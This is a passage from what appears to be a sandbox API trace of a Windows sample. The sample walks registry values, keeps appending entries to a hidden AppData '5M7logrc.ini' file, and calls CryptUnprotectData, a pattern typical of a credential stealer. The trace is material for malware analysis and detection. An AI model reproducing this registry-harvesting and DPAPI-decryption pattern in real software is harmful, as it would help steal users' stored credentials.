EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.460] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.460] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.460] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x22, ByteOffset=0xdd5fc*=680, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.461] NtClose (Handle=0x144) returned 0x0 [0236.465] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.465] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.466] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.466] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.466] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x18, ByteOffset=0xdd5fc*=714, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.469] NtClose (Handle=0x144) returned 0x0 [0236.471] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.471] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.471] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.471] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.471] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1e, ByteOffset=0xdd5fc*=738, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.471] NtClose (Handle=0x144) returned 0x0 [0236.472] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.473] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.473] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.473] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.473] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x18, ByteOffset=0xdd5fc*=768, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.473] NtClose (Handle=0x144) returned 0x0 [0236.474] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.474] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.474] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.474] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.475] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x20, ByteOffset=0xdd5fc*=792, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.475] NtClose (Handle=0x144) returned 0x0 [0236.476] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.476] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.476] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.476] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.476] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.476] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x14, ByteOffset=0xdd5fc*=824, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.477] NtClose (Handle=0x144) returned 0x0 [0236.477] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.478] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.478] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.478] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.478] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x22, ByteOffset=0xdd5fc*=844, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.478] NtClose (Handle=0x144) returned 0x0 [0236.479] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x8, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.479] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.479] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.479] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.479] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.479] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1c, ByteOffset=0xdd5fc*=878, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.480] NtClose (Handle=0x144) returned 0x0 [0236.486] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="crypt32.dll", BaseAddress=0xdd638 | out: BaseAddress=0xdd638*=0x75830000) returned 0x0 [0236.615] CryptUnprotectData (in: pDataIn=0xdd6bc, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0xdd6b4 | out: ppszDataDescr=0x0, pDataOut=0xdd6b4) returned 1 [0236.637] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.637] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.637] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.637] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.637] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.637] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x26, ByteOffset=0xdd5fc*=906, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.638] NtClose (Handle=0x150) returned 0x0 [0236.639] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x9, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.639] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.639] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.639] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.639] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.639] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x2e, ByteOffset=0xdd5fc*=944, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.640] NtClose (Handle=0x150) returned 0x0 [0236.660] RtlIntegerToChar (in: Value=0x0, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="0") returned 0x0 [0236.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.660] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.660] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.660] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.660] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x6, ByteOffset=0xdd5fc*=990, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.660] NtClose (Handle=0x150) returned 0x0 [0236.664] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0xa, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.664] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.664] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.665] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.665] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.665] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x20, ByteOffset=0xdd5fc*=996, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.665] NtClose (Handle=0x150) returned 0x0 [0236.680] RtlIntegerToChar (in: Value=0xe0003, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="917507") returned 0x0 [0236.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.680] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.680] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.680] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.680] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x10, ByteOffset=0xdd5fc*=1028, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.680] NtClose (Handle=0x150) returned 0x0 [0236.681] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0xb, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.681] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.682] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.682] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.682] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.682] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x2e, ByteOffset=0xdd5fc*=1044, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.682] NtClose (Handle=0x150) returned 0x0 [0236.683] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.683] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.683] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.683] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.683] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0xbc, ByteOffset=0xdd5fc*=1090, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.684] NtClose (Handle=0x150) returned 0x0 [0236.685] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0xc, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.685] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", 